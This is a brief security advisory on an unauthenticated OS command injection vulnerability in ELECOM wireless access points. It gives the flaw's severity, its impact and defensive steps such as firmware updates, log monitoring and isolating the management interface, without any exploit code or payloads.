An unauthenticated OS command injection vulnerability in ELECOM wireless LAN access points allows attackers to execute arbitrary code on the device.

The device fails to properly sanitize the username parameter, leading to OS command injection. An unauthenticated attacker can exploit this to execute arbitrary commands with device-level privileges.

A CVSS score of 9.8 signifies a critical threat to network integrity. Exploitation allows an attacker to take full control of the wireless access point, potentially enabling traffic interception, redirection, or the use of the device as a pivot point into the local network.

Immediate Action: Update the firmware on all ELECOM access points to the latest secure version provided by the vendor.

Proactive Monitoring: Monitor device logs for shell-like characters or suspicious command patterns in web request parameters.

Compensating Controls: Isolate the management interface and restrict access to authorized personnel to mitigate the risk from remote attackers.

Public Exploit Available: Unknown

This is a critical vulnerability that allows full device compromise. Immediate firmware updates are required to mitigate the risk of remote code execution.